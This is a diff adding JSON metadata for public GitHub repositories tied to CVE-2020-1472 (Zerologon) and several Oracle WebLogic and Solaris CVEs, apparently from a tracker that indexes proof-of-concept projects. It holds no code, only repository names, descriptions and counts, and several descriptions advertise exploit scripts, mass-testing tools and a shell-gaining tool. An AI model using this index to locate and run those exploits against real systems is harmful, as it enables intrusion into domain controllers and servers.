+ "html_url": "https:\/\/github.com\/SaharAttackit\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-12-23T08:12:21Z", + "updated_at": "2020-12-23T08:24:12Z", + "pushed_at": "2020-12-23T08:13:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325937253, + "name": "zerologon", + "full_name": "wrathfulDiety\/zerologon", + "owner": { + "login": "wrathfulDiety", + "id": 36190613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36190613?v=4", + "html_url": "https:\/\/github.com\/wrathfulDiety", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wrathfulDiety\/zerologon", + "description": "zerologon script to exploit CVE-2020-1472 CVSS 10\/10", + "fork": false, + "created_at": "2021-01-01T07:38:58Z", + "updated_at": "2021-01-17T15:08:53Z", + "pushed_at": "2021-01-03T15:43:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 327729919, + "name": "ZeroLogon-Exploitation-Check", + "full_name": "YossiSassi\/ZeroLogon-Exploitation-Check", + "owner": { + "login": "YossiSassi", + "id": 23126190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23126190?v=4", + "html_url": "https:\/\/github.com\/YossiSassi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YossiSassi\/ZeroLogon-Exploitation-Check", + "description": "quick'n'dirty automated checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon), using leading artifects in determining an actual exploitation of CVE-2020-1472. requires admin access to the DCs", + "fork": false, + "created_at": "2021-01-07T21:35:16Z", + "updated_at": "2023-09-19T22:49:48Z", + "pushed_at": "2021-01-08T12:14:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 331439225, + "name": "zerologon", + "full_name": "sho-luv\/zerologon", + "owner": { + "login": "sho-luv", + "id": 1679089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1679089?v=4", + "html_url": "https:\/\/github.com\/sho-luv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sho-luv\/zerologon", + "description": "Zerologon Check and Exploit - Discovered by Tom Tervoort of Secura and expanded on @Dirkjanm's cve-2020-1472 coded example. This tool will check, exploit and restore password to original state", + "fork": false, + "created_at": "2021-01-20T21:38:47Z", + "updated_at": "2023-11-07T15:34:35Z", + "pushed_at": "2022-04-12T23:27:40Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 343288379, + "name": "ZeroLogon-Exploit", + "full_name": "hell-moon\/ZeroLogon-Exploit", + "owner": { + "login": "hell-moon", + "id": 46636809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46636809?v=4", + "html_url": "https:\/\/github.com\/hell-moon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hell-moon\/ZeroLogon-Exploit", + "description": "Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null", + "fork": false, + "created_at": "2021-03-01T04:21:47Z", + "updated_at": "2022-10-08T19:00:21Z", + "pushed_at": "2021-03-01T19:24:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 355036509, + "name": "Zerologon", + "full_name": "Udyz\/Zerologon", + "owner": { + "login": "Udyz", + "id": 39673284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4", + "html_url": "https:\/\/github.com\/Udyz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Udyz\/Zerologon", + "description": "Exploit Code for CVE-2020-1472 aka Zerologon", + "fork": false, + "created_at": "2021-04-06T02:48:35Z", + "updated_at": "2024-08-12T20:11:53Z", + "pushed_at": "2021-04-07T06:45:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 360650643, + "name": "CVE-2020-1472", + "full_name": "itssmikefm\/CVE-2020-1472", + "owner": { + "login": "itssmikefm", + "id": 38843879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38843879?v=4", + "html_url": "https:\/\/github.com\/itssmikefm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itssmikefm\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2021-04-22T18:51:09Z", + "updated_at": "2021-04-22T19:03:41Z", + "pushed_at": "2021-04-22T19:03:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 379594309, + "name": "zeroscan", + "full_name": "B34MR\/zeroscan", + "owner": { + "login": "B34MR", + "id": 10254849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10254849?v=4", + "html_url": "https:\/\/github.com\/B34MR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B34MR\/zeroscan", + "description": "Zeroscan is a Domain Controller vulnerability scanner, that currently includes checks for Zerologon (CVE-2020-1472), MS-PAR\/MS-RPRN and SMBv2 Signing.", + "fork": false, + "created_at": "2021-06-23T12:23:48Z", + "updated_at": "2024-03-17T09:02:01Z", + "pushed_at": "2022-04-09T12:01:43Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1472", + "cve-2021-1675", + "domain-controller", + "pentest", + "pentest-tool", + "pentesting", + "python", + "zerologon" + ], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 462124353, + "name": "SecuraBV-CVE-2020-1472", + "full_name": "TheJoyOfHacking\/SecuraBV-CVE-2020-1472", + "owner": { + "login": "TheJoyOfHacking", + "id": 99463221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4", + "html_url": "https:\/\/github.com\/TheJoyOfHacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheJoyOfHacking\/SecuraBV-CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2022-02-22T03:33:24Z", + "updated_at": "2022-02-22T03:33:37Z", + "pushed_at": "2022-02-22T03:33:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462124410, + "name": "dirkjanm-CVE-2020-1472", + "full_name": "TheJoyOfHacking\/dirkjanm-CVE-2020-1472", + "owner": { + "login": "TheJoyOfHacking", + "id": 99463221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4", + "html_url": "https:\/\/github.com\/TheJoyOfHacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheJoyOfHacking\/dirkjanm-CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2022-02-22T03:33:38Z", + "updated_at": "2022-02-22T03:33:49Z", + "pushed_at": "2022-02-22T03:33:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465532157, + "name": "Zero-day-scanning", + "full_name": "Anonymous-Family\/Zero-day-scanning", + "owner": { + "login": "Anonymous-Family", + "id": 98486038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98486038?v=4", + "html_url": "https:\/\/github.com\/Anonymous-Family", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anonymous-Family\/Zero-day-scanning", + "description": "Zero-day-scanning is a Domain Controller vulnerability scanner, that currently includes checks for Zero-day-scanning (CVE-2020-1472), MS-PAR\/MS-RPRN and SMBv2 Signing.", + "fork": false, + "created_at": "2022-03-03T01:55:28Z", + "updated_at": "2023-10-14T12:41:31Z", + "pushed_at": "2022-03-03T07:50:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 465533233, + "name": "CVE-2020-1472", + "full_name": "Anonymous-Family\/CVE-2020-1472", + "owner": { + "login": "Anonymous-Family", + "id": 98486038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98486038?v=4", + "html_url": "https:\/\/github.com\/Anonymous-Family", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anonymous-Family\/CVE-2020-1472", + "description": "Test tool for CVE-2020-1472", + "fork": false, + "created_at": "2022-03-03T02:00:21Z", + "updated_at": "2022-03-03T02:01:04Z", + "pushed_at": "2023-05-01T22:24:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 475642504, + "name": "zerologon", + "full_name": "carlos55ml\/zerologon", + "owner": { + "login": "carlos55ml", + "id": 82476093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82476093?v=4", + "html_url": "https:\/\/github.com\/carlos55ml", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carlos55ml\/zerologon", + "description": "Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472). ", + "fork": false, + "created_at": "2022-03-29T22:43:50Z", + "updated_at": "2022-03-29T21:38:34Z", + "pushed_at": "2022-03-29T22:34:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 530954073, + "name": "ZeroLogon", + "full_name": "Rvn0xsy\/ZeroLogon", + "owner": { + "login": "Rvn0xsy", + "id": 19944759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19944759?v=4", + "html_url": "https:\/\/github.com\/Rvn0xsy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rvn0xsy\/ZeroLogon", + "description": "CVE-2020-1472 C++", + "fork": false, + "created_at": "2022-08-31T06:01:02Z", + "updated_at": "2024-08-12T20:26:38Z", + "pushed_at": "2022-09-02T16:25:01Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 83, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 543363896, + "name": "MassZeroLogon", + "full_name": "guglia001\/MassZeroLogon", + "owner": { + "login": "guglia001", + "id": 7321539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7321539?v=4", + "html_url": "https:\/\/github.com\/guglia001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guglia001\/MassZeroLogon", + "description": "Tool for mass testing ZeroLogon vulnerability CVE-2020-1472", + "fork": false, + "created_at": "2022-09-30T00:03:12Z", + "updated_at": "2024-01-10T12:56:49Z", + "pushed_at": "2022-09-30T00:09:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 543513500, + "name": "MassZeroLogon", + "full_name": "likeww\/MassZeroLogon", + "owner": { + "login": "likeww", + "id": 51168412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51168412?v=4", + "html_url": "https:\/\/github.com\/likeww", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likeww\/MassZeroLogon", + "description": "Tool for mass testing ZeroLogon vulnerability CVE-2020-1472", + "fork": false, + "created_at": "2022-09-30T08:59:31Z", + "updated_at": "2022-09-30T00:09:44Z", + "pushed_at": "2022-09-30T00:09:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 569087060, + "name": "CVE-2020-1472", + "full_name": "dr4g0n23\/CVE-2020-1472", + "owner": { + "login": "dr4g0n23", + "id": 68361881, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68361881?v=4", + "html_url": "https:\/\/github.com\/dr4g0n23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dr4g0n23\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2022-11-22T03:35:47Z", + "updated_at": "2022-11-22T03:37:43Z", + "pushed_at": "2022-11-25T10:09:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603449630, + "name": "CVE-2020-1472-LAB", + "full_name": "RicYaben\/CVE-2020-1472-LAB", + "owner": { + "login": "RicYaben", + "id": 32867697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32867697?v=4", + "html_url": "https:\/\/github.com\/RicYaben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RicYaben\/CVE-2020-1472-LAB", + "description": "Lab introduction to ZeroLogon", + "fork": false, + "created_at": "2023-02-18T14:52:17Z", + "updated_at": "2024-11-19T09:17:53Z", + "pushed_at": "2024-02-11T19:40:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634597926, + "name": "CVE-2020-1472", + "full_name": "Akash7350\/CVE-2020-1472", + "owner": { + "login": "Akash7350", + "id": 104816473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104816473?v=4", + "html_url": "https:\/\/github.com\/Akash7350", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akash7350\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2023-04-30T16:41:55Z", + "updated_at": "2023-05-05T17:34:36Z", + "pushed_at": "2023-04-30T18:10:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 678208074, + "name": "ZeroLogon-to-Shell", + "full_name": "c3rrberu5\/ZeroLogon-to-Shell", + "owner": { + "login": "c3rrberu5", + "id": 109983457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109983457?v=4", + "html_url": "https:\/\/github.com\/c3rrberu5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3rrberu5\/ZeroLogon-to-Shell", + "description": "This is a combination of the zerologon_tester.py code (https:\/\/raw.githubusercontent.com\/SecuraBV\/CVE-2020-1472\/master\/zerologon_tester.py) and the tool evil-winrm to get a shell.", + "fork": false, + "created_at": "2023-08-14T02:40:18Z", + "updated_at": "2023-08-14T02:41:31Z", + "pushed_at": "2023-08-14T02:47:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739960583, + "name": "0logon", + "full_name": "logg-1\/0logon", + "owner": { + "login": "logg-1", + "id": 155867031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155867031?v=4", + "html_url": "https:\/\/github.com\/logg-1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/logg-1\/0logon", + "description": "MS-NRPC (Microsoft NetLogon Remote Protocol)\/CVE-2020-1472", + "fork": false, + "created_at": "2024-01-07T04:27:17Z", + "updated_at": "2024-01-07T04:30:03Z", + "pushed_at": "2024-01-07T04:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748399909, + "name": "Zerologon-Attack-CVE-2020-1472-POC", + "full_name": "whoami-chmod777\/Zerologon-Attack-CVE-2020-1472-POC", + "owner": { + "login": "whoami-chmod777", + "id": 33582093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33582093?v=4", + "html_url": "https:\/\/github.com\/whoami-chmod777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whoami-chmod777\/Zerologon-Attack-CVE-2020-1472-POC", + "description": null, + "fork": false, + "created_at": "2024-01-25T22:11:57Z", + "updated_at": "2024-10-09T08:47:13Z", + "pushed_at": "2024-01-25T22:12:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 775297856, + "name": "Zerologon_CVE-2020-1472", + "full_name": "JolynNgSC\/Zerologon_CVE-2020-1472", + "owner": { + "login": "JolynNgSC", + "id": 164031233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164031233?v=4", + "html_url": "https:\/\/github.com\/JolynNgSC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JolynNgSC\/Zerologon_CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2024-03-21T05:52:40Z", + "updated_at": "2024-03-21T05:52:40Z", + "pushed_at": "2024-03-21T07:21:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811466494, + "name": "zerologon-poc", + "full_name": "blackh00d\/zerologon-poc", + "owner": { + "login": "blackh00d", + "id": 40231726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40231726?v=4", + "html_url": "https:\/\/github.com\/blackh00d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackh00d\/zerologon-poc", + "description": "A script to exploit CVE-2020-1472 (Zerologon)", + "fork": false, + "created_at": "2024-06-06T16:44:38Z", + "updated_at": "2024-06-06T16:46:22Z", + "pushed_at": "2024-06-06T16:46:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14750.json b/2020/CVE-2020-14750.json new file mode 100644 index 0000000000..16d3478ab5 --- /dev/null +++ b/2020/CVE-2020-14750.json @@ -0,0 +1,64 @@ +[ + { + "id": 310595304, + "name": "CVE-2020-14750", + "full_name": "pprietosanchez\/CVE-2020-14750", + "owner": { + "login": "pprietosanchez", + "id": 56593660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56593660?v=4", + "html_url": "https:\/\/github.com\/pprietosanchez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pprietosanchez\/CVE-2020-14750", + "description": "PoC para las vulnerabilidades CVE-2020-14750 y cve-2020-14882", + "fork": false, + "created_at": "2020-11-06T12:46:03Z", + "updated_at": "2024-08-12T20:07:25Z", + "pushed_at": "2020-11-10T10:54:36Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 46, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 311421880, + "name": "CVE-2020-14750", + "full_name": "kkhacklabs\/CVE-2020-14750", + "owner": { + "login": "kkhacklabs", + "id": 74205561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74205561?v=4", + "html_url": "https:\/\/github.com\/kkhacklabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkhacklabs\/CVE-2020-14750", + "description": null, + "fork": false, + "created_at": "2020-11-09T17:58:11Z", + "updated_at": "2020-11-09T18:28:48Z", + "pushed_at": "2020-11-09T18:28:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14756.json b/2020/CVE-2020-14756.json new file mode 100644 index 0000000000..1e97c6ed72 --- /dev/null +++ b/2020/CVE-2020-14756.json @@ -0,0 +1,64 @@ +[ + { + "id": 333266570, + "name": "CVE-2020-14756", + "full_name": "Y4er\/CVE-2020-14756", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/CVE-2020-14756", + "description": "WebLogic T3\/IIOP RCE ExternalizableHelper.class of coherence.jar", + "fork": false, + "created_at": "2021-01-27T01:24:52Z", + "updated_at": "2024-08-12T20:09:47Z", + "pushed_at": "2021-01-27T01:40:56Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 79, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 335868582, + "name": "weblogic2021", + "full_name": "somatrasss\/weblogic2021", + "owner": { + "login": "somatrasss", + "id": 69829610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69829610?v=4", + "html_url": "https:\/\/github.com\/somatrasss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/somatrasss\/weblogic2021", + "description": "CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109", + "fork": false, + "created_at": "2021-02-04T07:03:56Z", + "updated_at": "2024-08-12T20:10:03Z", + "pushed_at": "2021-09-13T02:58:00Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14871.json b/2020/CVE-2020-14871.json new file mode 100644 index 0000000000..97710eb2a6 --- /dev/null +++ b/2020/CVE-2020-14871.json @@ -0,0 +1,33 @@ +[ + { + "id": 441761324, + "name": "CVE-2020-14871-Exploit", + "full_name": "robidev\/CVE-2020-14871-Exploit", + "owner": { + "login": "robidev", + "id": 32569599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32569599?v=4", + "html_url": "https:\/\/github.com\/robidev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robidev\/CVE-2020-14871-Exploit", + "description": "This is a basic ROP based exploit for CVE 2020-14871. CVE 2020-14871 is a vulnerability in Sun Solaris systems libpam library, and exploitable over ssh", + "fork": false, + "created_at": "2021-12-25T21:27:59Z", + "updated_at": "2022-10-25T13:43:08Z", + "pushed_at": "2021-12-25T21:29:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14882.json b/2020/CVE-2020-14882.json new file mode 100644 index 0000000000..0ea1551e76 --- /dev/null +++ b/2020/CVE-2020-14882.json @@ -0,0 +1,958 @@ +[ + { + "id": 252131233, + "name": "exphub", + "full_name": "zhzyker\/exphub", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/exphub", + "description": "Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340", + "fork": false, + "created_at": "2020-04-01T09:33:35Z", + "updated_at": "2024-11-28T15:03:33Z", + "pushed_at": "2021-04-04T09:13:57Z", + "stargazers_count": 4136, + "watchers_count": 4136, + "has_discussions": false, + "forks_count": 1101, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-10199", + "cve-2020-10204", + "cve-2020-11444", + "cve-2020-14882", + "cve-2020-1938", + "cve-2020-2551", + "cve-2020-2555", + "cve-2020-2883", + "cve-2020-5902", + "drupal", + "exp", + "exploit", + "getshell", + "nexus", + "poc", + "tomcat", + "vulnerability", + "weblogic", + "webshell" + ], + "visibility": "public", + "forks": 1101, + "watchers": 4136, + "score": 0, + "subscribers_count": 149 + }, + { + "id": 307998445, + "name": "CVE-2020-14882", + "full_name": "jas502n\/CVE-2020-14882", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2020-14882", + "description": "CVE-2020–14882、CVE-2020–14883", + "fork": false, + "created_at": "2020-10-28T11:43:37Z", + "updated_at": "2024-11-21T13:08:05Z", + "pushed_at": "2020-11-16T04:23:09Z", + "stargazers_count": 283, + "watchers_count": 283, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 283, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 308145197, + "name": "CVE-2020-14882", + "full_name": "s1kr10s\/CVE-2020-14882", + "owner": { + "login": "s1kr10s", + "id": 5374475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5374475?v=4", + "html_url": "https:\/\/github.com\/s1kr10s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1kr10s\/CVE-2020-14882", + "description": "CVE-2020–14882 by Jang", + "fork": false, + "created_at": "2020-10-28T21:28:12Z", + "updated_at": "2024-08-12T20:07:10Z", + "pushed_at": "2020-10-29T03:57:09Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 308238126, + "name": "CVE-2020-14882", + "full_name": "XTeam-Wing\/CVE-2020-14882", + "owner": { + "login": "XTeam-Wing", + "id": 25416365, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25416365?v=4", + "html_url": "https:\/\/github.com\/XTeam-Wing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XTeam-Wing\/CVE-2020-14882", + "description": "CVE-2020-14882 Weblogic-Exp", + "fork": false, + "created_at": "2020-10-29T06:30:30Z", + "updated_at": "2024-02-05T10:45:27Z", + "pushed_at": "2020-10-29T06:36:01Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + 